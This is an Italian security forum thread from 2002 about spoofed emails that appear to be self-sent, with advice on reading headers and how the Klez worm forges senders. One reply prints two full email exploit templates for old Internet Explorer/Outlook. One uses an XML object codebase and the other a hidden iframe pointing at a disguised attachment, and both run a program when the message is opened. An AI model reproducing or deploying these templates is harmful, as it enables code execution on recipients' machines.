Condividi:        

Mail che si autoinviano?!?!

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

Mail che si autoinviano?!?!

Postdi Lohn Kamayr » 22/04/02 11:23

Vi spiego cosa mi è successo oggi con una mail... a me sembra una cosa assurda ma magari sono semplicemente io ke non capisco qualkosa...

Oggi mi è arrivata una mail da un mio conoscente ke mi kiede spiegazioni di una mail da me inviata qualke giorno fa avente come subject "A special powful tool" e come testo questo: "Hello,This is a special powful tool
I wish you would like it. "
In allegato c'erano dei file di cui non so però ke tipo di file fossero nè tantomeno l'estensione...

Io ovviamente non ho mai mandato questa mail al mio amico anke perkè io non conosco nemmeno questo suo indirizzo e-mail, non ho mai ricevuto e-amil da lui da questo indirizzo e non è quindi presente nella mia rubrica...
Il mio sistema è privo di virus, trojan e affini controllato con norton, cleaner + il firewall ke ho sempre attivo...

Ora mi kiedo come è possibile tutto ciò? Può essere ke il computer infetto sia quello del mio amico e il messaggio è stato generato dal suo computer e a me inviato prendendo il mio indirizzo e-mail dalla sua rubrica??!?!
Oppure come diavolo è possibile tutto ciò?!?!
Insomma a me sembra una cosa assurda... sapete darmi qualke spiegazione?!?!?

Grazie ;)
Lohn Kamayr
Newbie
 
Post: 4
Iscritto il: 22/04/02 11:04

Sponsor
 

Re: Mail che si autoinviano?!?!

Postdi dado » 22/04/02 11:38

Lohn Kamayr ha scritto:Ora mi kiedo come è possibile tutto ciò? Può essere ke il computer infetto sia quello del mio amico e il messaggio è stato generato dal suo computer e a me inviato prendendo il mio indirizzo e-mail dalla sua rubrica??!?!


Ti sei risposto da solo! Questo è il modo principale con il quale i virus si diffondono.
Prendono gli indirizzi dalla rubrica del pc infetto e si autoinviano di nascosto... tu non aprire gli allegati, cancella l'email e avverti il tuo amico!

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Postdi Lohn Kamayr » 22/04/02 12:37

Grazie della risposta DADO... ma il mio problema è un altro forse non ho spiegato bene...
Insomma lui ha ricevuto da me una mail... mail ke io non ho mai inviato... insomma la mail è partita dal mio computer e vorrei sapere come è possibile ciò... dato ke io non avevo quell'indirizzo in nessuna rubrica, nessun file del pc non sapevo nemmeno ke esistesse quell'indirizzo insomma...
Lohn Kamayr
Newbie
 
Post: 4
Iscritto il: 22/04/02 11:04

Postdi Triumph Of Steel » 22/04/02 13:19

Beh, le cose secondo me sono 2:

- Hai un virus e non lo sai

- L'email arrivata al tizio non la hai mandata tu!! ma risulta il tuo indirizzo nella mail (strano anche questo) ...

Il soggetto ricorda molto un virus!! quindi fai una bella scansione del tuo PC dopo aver aggiornato l'AV!!
Avatar utente
Triumph Of Steel
Moderatore
 
Post: 7852
Iscritto il: 22/08/01 01:00

Postdi jena » 22/04/02 14:01

Huè raga guardate che mandare mail con indirizzo fasullo è una cazzata da fare.
Cmq il più delle volte basta controllare l'headers (si scriverà così? mbhò) della mail e vedere da chi arriva.
Dio c'è ma ci odia.
jena
Utente Junior
 
Post: 23
Iscritto il: 22/04/02 03:17

Postdi Lohn Kamayr » 22/04/02 15:04

Sì si kiama header... infatti gli ho già kiesto se può inviarmelo con copia incolla così vedo l'ip da cui è partito il messaggio...
Ma x sapere l'header di una mail è necessario aprirla con outlook o ci sono anke altri modi x vederlo magari usando EUDORA o guardando la posta direttamente via web?
Certo mandare mail con altro nome è fattibile... ma perkè qualkuno avrebbe dovuto farlo e scirvere una mail così stupida?!?!

Cmq la scansione del mio pc l'ho fatta senza trovare nulla... scansione fatta con cleaner e norton antivirus aggioranti entrambi...
Boh x me resta un mistero...
Lohn Kamayr
Newbie
 
Post: 4
Iscritto il: 22/04/02 11:04

Postdi dado » 22/04/02 18:21

X veder l'header basta che selezioni l'email anche solo in preview senza aprirla e poi facendo tasto destro del mouse selezioni proprietà e dettagli.
Cmq, l'importante è non aprire l'allegato (se l'email è solo in formato text puoi anche aprirla e guardarci l'header...).

Ah, dimenticavo... anche l'IP cmq è facilmente falsabile!

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Postdi jena » 23/04/02 00:11

Controlla cn netstat -a di non avere porte aperte che non dovrebebro esserlo(es. 110).
Per gli antivirus non sò quanto possano aiutare dato che più volte li ho visti fallire...con virus fatte al momento ovviamente.
Ricorda di aggiornare il + possibile i programmi che usi.
Explorer, Outlook in primis ultimamente sono al centro dell'attenzione. Nuove bug permettono ad un virus di installarsi nel momento in cui scarichi l'e-mail. Quindi anche senza aver fatto prew.
Controlla di non avere risorse condivise.
Se vuoi un consiglio io preferirei Opera al posto di explorer. O netscape. E cambia anche Outlook. E anche windows ;P. scherzo
cya
Dio c'è ma ci odia.
jena
Utente Junior
 
Post: 23
Iscritto il: 22/04/02 03:17

Postdi Lohn Kamayr » 23/04/02 09:38

Scusate ma se uno non usa outlook ma usa Eudora o guarda la posta direttamente online c'è un modo x ottenere cmq l'header dell'e-mail?

Il netstat è la prima cosa ke ho fatto e non ho alcuna porta aperta ke non dovrebbe esserlo ;)

E cmq non lo uso proprio outlook... la posta la guardo online e basta... beh explorer quello si ke lo uso ;)
Lohn Kamayr
Newbie
 
Post: 4
Iscritto il: 22/04/02 11:04

Postdi dado » 23/04/02 11:22

Mah... credo che per Eudora valga più o meno la stessa procedura che si usa con OE per vedere l'header! Anche se non posso garantirtelo, avendolo usato solo poche volte e non sul mio pc....

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Headers

Postdi BianConiglio » 26/04/02 08:52

Basta salvarsi la mail in qualsiasi programma e farne le proprietà, oppure rinominare il file ( eml per outlook ) e dare un occhio al contenuto....
Insomma.....niente di speciale :roll:
BianConiglio
Utente Senior
 
Post: 4710
Iscritto il: 26/12/01 01:00
Località: Varese / Lugano

Forse sono d'aiuto

Postdi BianConiglio » 26/04/02 17:17

Allora, mi sembra ci sia un po' di confusione in questo post.

Come ho già detto in altri post le versioni di IE inferiori alla 6 hanno un simpatico bug per il quale è possibile eseguire files sia sulla macchina in questione sia gli allegati, sia codice html, vbs o java ( e quelli supportati ) opportunamente inserito nel corpo del messaggio.

Gli exploit per farlo sono disponibili in molti siti e li propongo qui per l'ultima volta ( spero che i moderatori non si incazzicchino perchè mi ripeto in post diversi )

Questo è il contenuto di una generica e non completa ( non personalizzata e indirizzata ) mail che avvierà un programma posizionato sulla macchina che la apre.
Non pensate che gli eseguibili su una macchina non siano dannosi, basti pensare che un allegato ( in teoria possibilmente dannoso ) è presente sulla macchina nel momento dell'apertura della mail ( in temp o altre cartelle, a discrezione del programma di posta utilizzato o dalle impostazioni date dall'utente )

Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="----=_NextPart_000_0397_01C1C9DC.6A16ED00";
type="multipart/alternative"
X-Priority: 3
X-MSMail-Priority: Normal

------=_NextPart_000_0397_01C1C9DC.6A16ED00
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0398_01C1C9DC.6A16ED00"


------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

/*Message*/

------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft><FONT face=3DArial color=3D#000000 size=3D2>
/*Message*/
</FONT></DIV>
<DIV><BR>&nbsp;</DIV>
<DIV><BR>&nbsp;</DIV>
<DIV><BR>&nbsp;</DIV>
<DIV><BR>&nbsp;</DIV>
<DIV><BR>&nbsp;</DIV>
<DIV><BR>&nbsp;</DIV>
<span datasrc=3D"#oExec" datafld=3D"exploit" dataformatas=3D"html"></span>
<xml id=3D"oExec">
<security>
<exploit>
<![CDATA[
<object id=3D"oFile" classid=3D"clsid:11111111-1111-1111-1111-111111111111" codebase=3D"/*Program to run*/"></object>
]]>
</exploit>
</security>
</xml>
</BODY></HTML>

------=_NextPart_001_0398_01C1C9DC.6A16ED00--
------=_NextPart_000_0397_01C1C9DC.6A16ED00--




Con quest'altro exploit ecco che è possibile eseguire l'allegato.

Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML>
<HEAD></HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe>
/*Message*/
</BODY>
</HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="/*Name of attachment*/"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

#*BASE64Attachment to run*#
--====_ABC1234567890DEF_====


Entrambi questo codici sono inoffensivi per le versioni di IE ( e quindi outlook ) superiori alla 5.5 e patchati con gli tultimi aggiornamenti ( necessario per impedire l'esecuzione di un programma in locale http://www.microsoft.com/technet/treevi ... 02-015.asp) . Se li utilizzerai su una macchina non coperta o protetta, sappi che sei un pezzente.

Per dare un occhio agli headers di una mail basta salvarla ed aprirla con un qualsiasi editor di testo ma dall' ip non è possibile risalire al mittente.....non siamo la polizia postale...è solo possibile restringere il campo ( a seconda degli otetti ) ad un provider...bene che vada , tracciando o informandosi sugli otetti, si può risalire alla regione o al max provincia, ma dipende dai provider e non me ne sono interessato ultimamente.

Molti si sono lamentati ( non solo in questo forum ) che amici avessero ricevuto mail provenienti da loro con allegati infetti ma nel momento in cui il possibile mittente ha fatto una scansione ecco che nessun virus è stato rilevato pur l'antivurus fosse aggiornato per scovare quello specifico virus...perchè ???

:diavolo: Perchè i virus writer sono dei simpaticoni !! :diavolo:

Le ultime varianti dei più noti virus, primo fra tutti Klez non solo scansiscono il sistema alla ricerca di mail in qualsiasi file, ma non utilizzano più l'indirizzo dell'infetto per autospedirsi, utilizzano uno degli indirizzi trovati, al quale il virus non si auto invia ( bè, poi questo dipende dalla versione )........ Insomma, se vengo infettato e nel mio pc Klez trova bian@coniglio.it e coniglio@bian.it, si autoinvia a bian@coniglio.it con mittente coniglio@bian.it ( estraneo all'infezione ) mentre la mia mail non compare da nessuna parte !

Bhom...ho detto tutto...

Ciauz

Aggiornamento delle 18.21
Mi è stato già chiesta una delucidazioen riguardo Klez... Bè, date un occhio qui : http://punto-informatico.it/p.asp?i=39867

Ri ciauzz
BianConiglio
Utente Senior
 
Post: 4710
Iscritto il: 26/12/01 01:00
Località: Varese / Lugano


Torna a Sicurezza e Privacy


Topic correlati a "Mail che si autoinviano?!?!":

Mail infette
Autore: danibi60
Forum: Sicurezza e Privacy
Risposte: 2

Chi c’è in linea

Visitano il forum: Nessuno e 121 ospiti